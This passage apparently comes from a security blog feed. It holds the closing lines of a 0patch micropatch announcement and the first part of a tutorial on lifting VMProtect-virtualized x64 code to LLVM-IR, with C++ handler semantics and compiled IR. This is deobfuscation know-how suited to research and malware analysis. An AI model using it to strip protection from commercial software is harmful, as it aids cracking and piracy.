Below is a video of our patch in action. Notice that with 0patch disabled, Calculator is launched both upon opening the Word document and upon previewing the RTF document in Windows Explorer Preview. In both cases, Process Monitor shows that control.exe gets launched, which loads the "malicious" executable, in our case spawning Calculator. With 0patch enabled, control.exe does not get launched, and therefore neither does Calculator.




In line with our guidelines, these patches require a PRO license. To obtain them and have them applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account, then purchase 0patch PRO.
For a free trial, contact [email protected].
 
Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatches.

We'd like to thank Will Dormann for an in-depth public analysis of this vulnerability, which helped us create a micropatch and protect our users.

To learn more about 0patch, please visit our Help Center.

Tickling VMProtect with LLVM: Part 1

By: fvrmatteo
8 September 2021 at 23:00

This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:

Foreword

First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.

  • In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I, hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
  • In 2018, a person nicknamed RYDB3RG, posted on Tuts4You a first insight on how LLVM optimizations could be beneficial when optimising VMProtected code. Although the easy example that was provided left me with a lot of questions on whether that approach would have been hassle-free or not.
  • In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.

The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.

Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.

With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.

I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.

Lifting

The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.

Lifting pipeline

Enough words or code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to make LLVM’s job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.

Liveness and aliasing information

Let’s start by saying that many deobfuscation tools are completely disregarding, or at best unsoundly handling, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM on the contrary is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally LLVM also has strong optimization passes benefiting from precise liveness information, that we absolutely want to take advantage of to clean any unnecessary stores to memory that are irrelevant after the execution of the virtualized code.

This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.

A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.

At a high level we can summarize the data-related virtual machine components as follows:

  • 30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.

  • 19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.

  • 16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won’t affect the others. Contrarily to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is also treated as the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.

  • 4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct with each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.

Helper functions

With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.

When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.

Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):

struct VirtualRegister final {
  union {
    alignas(1) struct {
      uint8_t b0;
      uint8_t b1;
      uint8_t b2;
      uint8_t b3;
      uint8_t b4;
      uint8_t b5;
      uint8_t b6;
      uint8_t b7;
    } byte;
    alignas(2) struct {
      uint16_t w0;
      uint16_t w1;
      uint16_t w2;
      uint16_t w3;
    } word;
    alignas(4) struct {
      uint32_t d0;
      uint32_t d1;
    } dword;
    alignas(8) uint64_t qword;
  } __attribute__((packed));
} __attribute__((packed));

using rref = size_t &__restrict__;

extern "C" uint8_t RAM[0];
extern "C" uint8_t GS[0];
extern "C" uint8_t FS[0];

extern "C"
size_t HelperStub(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR,
  rref vsp, rref vip,
  VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots);

extern "C"
size_t HelperFunction(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[19] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The VirtualRegister structure is meant to represent a VmRegister, divided in smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don’t necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64 bits bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.

The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions, that, once compiled to LLVM-IR, will generate a pointer parameter with a noalias attribute. The noalias attribute is hinting to the compiler that any memory access happening inside the function that is not dereferencing a pointer derived from the pointer parameter, is guaranteed not to alias with a memory access dereferencing a pointer derived from the pointer parameter.

The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.

The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.

The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.

The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.

The compiled and optimized LLVM-IR code for the described C++ definitions follows:

%struct.VirtualRegister = type { %union.anon }
%union.anon = type { i64 }
%struct.anon = type { i8, i8, i8, i8, i8, i8, i8, i8 }

@RAM = external local_unnamed_addr global [0 x i8], align 1
@GS = external local_unnamed_addr global [0 x i8], align 1
@FS = external local_unnamed_addr global [0 x i8], align 1

declare i64 @HelperStub(i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64, i64, i64, i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), %struct.VirtualRegister*, i64*) local_unnamed_addr

define i64 @HelperFunction(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %vmregs = alloca [30 x %struct.VirtualRegister], align 16
  %slots = alloca [30 x i64], align 16
  %vip = alloca i64, align 8
  %0 = bitcast [30 x %struct.VirtualRegister]* %vmregs to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %0, i8 0, i64 240, i1 false)
  %1 = bitcast [30 x i64]* %slots to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %1, i8 0, i64 240, i1 false)
  %2 = bitcast i64* %vip to i8*
  store i64 0, i64* %vip, align 8
  %arraydecay = getelementptr inbounds [30 x %struct.VirtualRegister], [30 x %struct.VirtualRegister]* %vmregs, i64 0, i64 0
  %arraydecay1 = getelementptr inbounds [30 x i64], [30 x i64]* %slots, i64 0, i64 0
  %call = call i64 @HelperStub(i64* nonnull align 8 dereferenceable(8) %rax, i64* nonnull align 8 dereferenceable(8) %rbx, i64* nonnull align 8 dereferenceable(8) %rcx, i64* nonnull align 8 dereferenceable(8) %rdx, i64* nonnull align 8 dereferenceable(8) %rsi, i64* nonnull align 8 dereferenceable(8) %rdi, i64* nonnull align 8 dereferenceable(8) %rbp, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %r8, i64* nonnull align 8 dereferenceable(8) %r9, i64* nonnull align 8 dereferenceable(8) %r10, i64* nonnull align 8 dereferenceable(8) %r11, i64* nonnull align 8 dereferenceable(8) %r12, i64* nonnull align 8 dereferenceable(8) %r13, i64* nonnull align 8 dereferenceable(8) %r14, i64* nonnull align 8 dereferenceable(8) %r15, i64* nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 0, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* nonnull %arraydecay, i64* nonnull %arraydecay1)
  ret i64 %call
}

Semantics of the handlers

We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.

The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.

STACK_PUSH

To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.

template <typename T> __attribute__((always_inline)) void STACK_PUSH(size_t &vsp, T value) {
  // Update the stack pointer
  vsp -= sizeof(T);
  // Store the value
  std::memcpy(&RAM[vsp], &value, sizeof(T));
}

We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.

STACK_POP

As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.

template <typename T> __attribute__((always_inline)) T STACK_POP(size_t &vsp) {
  // Fetch the value
  T value = 0;
  std::memcpy(&value, &RAM[vsp], sizeof(T));
  // Undefine the stack slot
  T undef = UNDEF<T>();
  std::memcpy(&RAM[vsp], &undef, sizeof(T));
  // Update the stack pointer
  vsp += sizeof(T);
  // Return the value
  return value;
}

We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.

ADD

Being a stack machine, we know that it is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back to the stack. There are four variations of the addition handler, meant to handle 8/16/32/64 bits operands, with the peculiarity that the 8 bits case is really popping 16 bits per operand off the stack and pushing a 16 bits result back to the stack to be consistent with the x64 push/pop alignment rules.

From what we just described the only thing we need is the virtual stack pointer, to be able to access the stack.

// ADD semantic

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool AF(T lhs, T rhs, T res) {
  return AuxCarryFlag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool PF(T res) {
  return ParityFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool ZF(T res) {
  return ZeroFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool SF(T res) {
  return SignFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool CF_ADD(T lhs, T rhs, T res) {
  return Carry<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool OF_ADD(T lhs, T rhs, T res) {
  return Overflow<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
void ADD_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags
  bool cf = CF_ADD(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = OF_ADD(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);
}

template <typename T>
__attribute__((always_inline))
void ADD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Initialize the operands
  T op1 = 0;
  T op2 = 0;
  // Fetch the operands
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  }
  // Calculate the add
  T res = UAdd(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  ADD_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  }
  // 7. Save the flags
  STACK_PUSH<size_t>(vsp, flags);
}

DEFINE_SEMANTIC_64(ADD_64) = ADD<uint64_t>;
DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
DEFINE_SEMANTIC(ADD_16) = ADD<uint16_t>;
DEFINE_SEMANTIC(ADD_8) = ADD<uint8_t>;

We can see that the function definition is templated with a T parameter that is internally used to generate the properly-sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally we are taking care of truncating and zero extending the special 8 bits case. Finally, after the unsigned addition took place, we rely on Remill’s semantically proven flag computations to calculate the fresh flags before pushing them to the stack.

The other binary and arithmetic operations are implemented following the same structure, with the correct operands access and flag computations.

PUSH_VMREG

This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and the value of the VmRegister. The template is additionally defining the size of the pushed value and the offset from the VmRegister slot base.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void PUSH_VMREG(size_t &vsp, VirtualRegister vmreg) {
  // Update the stack pointer
  vsp -= ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
  // Select the proper element of the virtual register
  if constexpr (Size == 64) {
    std::memcpy(&RAM[vsp], &vmreg.qword, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d0, sizeof(uint32_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d1, sizeof(uint32_t));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.word.w0, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.word.w1, sizeof(uint16_t));
    } else if constexpr (Offset == 2) {
      std::memcpy(&RAM[vsp], &vmreg.word.w2, sizeof(uint16_t));
    } else if constexpr (Offset == 3) {
      std::memcpy(&RAM[vsp], &vmreg.word.w3, sizeof(uint16_t));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = ZExt(vmreg.byte.b0);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      uint16_t byte = ZExt(vmreg.byte.b1);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
}

DEFINE_SEMANTIC(PUSH_VMREG_8_LOW) = PUSH_VMREG<8, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_8_HIGH) = PUSH_VMREG<8, 1>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWLOW) = PUSH_VMREG<16, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWHIGH) = PUSH_VMREG<16, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHLOW) = PUSH_VMREG<16, 2>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHHIGH) = PUSH_VMREG<16, 3>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_LOW) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_32(POP_VMREG_32) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_HIGH) = PUSH_VMREG<32, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_64) = PUSH_VMREG<64, 0>;

We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.

POP_VMREG

This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and a reference to the VmRegister to be updated. As before the template is defining the size of the popped value and the offset into the VmRegister slot.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void POP_VMREG(size_t &vsp, VirtualRegister &vmreg) {
  // Fetch and store the value on the virtual register
  if constexpr (Size == 64) {
    uint64_t value = 0;
    std::memcpy(&value, &RAM[vsp], sizeof(uint64_t));
    vmreg.qword = value;
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF00000000) | value);
    } else if constexpr (Offset == 1) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0x00000000FFFFFFFF) | UShl(ZExt(value), 32));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFFFFFF0000) | value);
    } else if constexpr (Offset == 1) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF0000FFFF) | UShl(ZExtTo<uint64_t>(value), 16));
    } else if constexpr (Offset == 2) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFF0000FFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 32));
    } else if constexpr (Offset == 3) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0x0000FFFFFFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 48));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b0 = Trunc(byte);
    } else if constexpr (Offset == 1) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b1 = Trunc(byte);
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
  // Clear the value on the stack
  if constexpr (Size == 64) {
    uint64_t undef = UNDEF<uint64_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    uint32_t undef = UNDEF<uint32_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint32_t));
  } else if constexpr (Size == 16) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  } else if constexpr (Size == 8) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  }
  // Update the stack pointer
  vsp += ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
}

DEFINE_SEMANTIC(POP_VMREG_8_LOW) = POP_VMREG<8, 0>;
DEFINE_SEMANTIC(POP_VMREG_8_HIGH) = POP_VMREG<8, 1>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWLOW) = POP_VMREG<16, 0>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWHIGH) = POP_VMREG<16, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHLOW) = POP_VMREG<16, 2>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHHIGH) = POP_VMREG<16, 3>;
DEFINE_SEMANTIC_64(POP_VMREG_32_LOW) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(POP_VMREG_32_HIGH) = POP_VMREG<32, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_64) = POP_VMREG<64, 0>;

In this case we can see that the update operation on the sub-chunks of the VmRegister is being done with some masking, shifting and zero extensions. This is to help LLVM with merging smaller integer values into a bigger integer value, whenever possible. As we saw in the STACK_POP operation, we are writing an undefined value to the current stack slot. Finally we are incrementing the virtual stack pointer.

LOAD and LOAD_GS

Generically speaking the LOAD handler is meant to pop an address from the stack, dereference it to load a value from one of the program segments and push the retrieved value to the top of the stack.

The following C++ snippet shows the implementation of a memory load from a generic memory pointer (e.g. SS or DS segments) and from the GS segment:

template <typename T> __attribute__((always_inline)) void LOAD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &RAM[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_SS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_SS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_SS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_SS_8) = LOAD<uint8_t>;

DEFINE_SEMANTIC_64(LOAD_DS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_DS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_DS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_DS_8) = LOAD<uint8_t>;

template <typename T> __attribute__((always_inline)) void LOAD_GS(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &GS[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_GS_64) = LOAD_GS<uint64_t>;
DEFINE_SEMANTIC(LOAD_GS_32) = LOAD_GS<uint32_t>;
DEFINE_SEMANTIC(LOAD_GS_16) = LOAD_GS<uint16_t>;
DEFINE_SEMANTIC(LOAD_GS_8) = LOAD_GS<uint8_t>;

By now the process should be clear. The only difference is the accessed zero-length array that will end up as base of the getelementptr instruction, which will directly reflect on the aliasing information that LLVM will be able to infer. The same kind of logic is applied to all the read or write memory accesses to the different segments.

DEFINE_SEMANTIC

In the code snippets of this section you may have noticed three macros named DEFINE_SEMANTIC_64, DEFINE_SEMANTIC_32 and DEFINE_SEMANTIC. They are the umpteenth trick borrowed from Remill and are meant to generate global variables with unmangled names, pointing to the function definition of the specialized template handlers. As an example, the ADD semantic definition for the 8/16/32/64 bits cases looks like this at the LLVM-IR level:

@SEM_ADD_64 = dso_local constant void (i64*)* @_Z3ADDIyEvRm, align 8
@SEM_ADD_32 = dso_local constant void (i64*)* @_Z3ADDIjEvRm, align 8
@SEM_ADD_16 = dso_local constant void (i64*)* @_Z3ADDItEvRm, align 8
@SEM_ADD_8 = dso_local constant void (i64*)* @_Z3ADDIhEvRm, align 8

UNDEF

In the code snippets of this section you may also have noticed the usage of a function called UNDEF. This function is used to store a fictitious __undef value after each pop from the stack. This is done to signal to LLVM that the popped value is no longer needed after being popped from the stack.

The __undef value is modeled as a global variable, which during the first phase of the optimization pipeline will be used by passes like DSE to kill overlapping post-dominated dead stores and it’ll be replaced with a real undef value near the end of the optimization pipeline such that the related store instruction will be gone on the final optimized LLVM-IR function.

Lifting a basic block

We now have a bunch of templates, structures and helper functions, but how do we actually end up lifting some virtualized code?

The high level idea is the following:

  • A new LLVM-IR function with the HelperStub signature is generated;
  • The function’s body is populated with call instructions to the VmHandler helper functions fed with the proper arguments (obtained from the HelperStub parameters);
  • The optimization pipeline is executed on the function, resulting in the inlining of all the helper functions (that are marked always_inline) and in the propagation of the values;
